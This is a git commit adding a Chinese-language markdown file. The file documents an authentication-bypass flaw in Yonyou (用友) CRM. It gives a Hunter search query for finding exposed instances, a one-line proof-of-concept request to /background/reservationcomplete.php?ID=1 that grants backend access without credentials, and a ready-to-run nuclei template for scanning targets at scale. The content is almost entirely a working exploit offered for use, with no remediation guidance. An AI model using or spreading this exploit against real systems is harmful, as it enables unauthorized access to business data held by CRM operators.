Create 用友CRM系统存在逻辑漏洞直接登录后台.md
This commit is contained in:
parent
9ff5b7d8d5
commit
3e702e61a2
50
用友CRM系统存在逻辑漏洞直接登录后台.md
Normal file
50
用友CRM系统存在逻辑漏洞直接登录后台.md
Normal file
@ -0,0 +1,50 @@
|
||||
## 用友CRM系统存在逻辑漏洞直接登录后台
|
||||
|
||||
## 鹰图
|
||||
```
|
||||
app.name="用友 CRM"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
/background/reservationcomplete.php?ID=1
|
||||
```
|
||||
|
||||
访问poc,页面返回空白
|
||||

|
||||
|
||||
直接就访问主要就登录后台了
|
||||

|
||||
|
||||

|
||||
|
||||
|
||||
## nuclei
|
||||
```
|
||||
id: yongyouU8_CRM-reservationcomplete
|
||||
info:
|
||||
name: 用友CRM系统存在逻辑漏洞直接登录后台
|
||||
author: wy876
|
||||
severity: high
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /background/reservationcomplete.php?ID=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user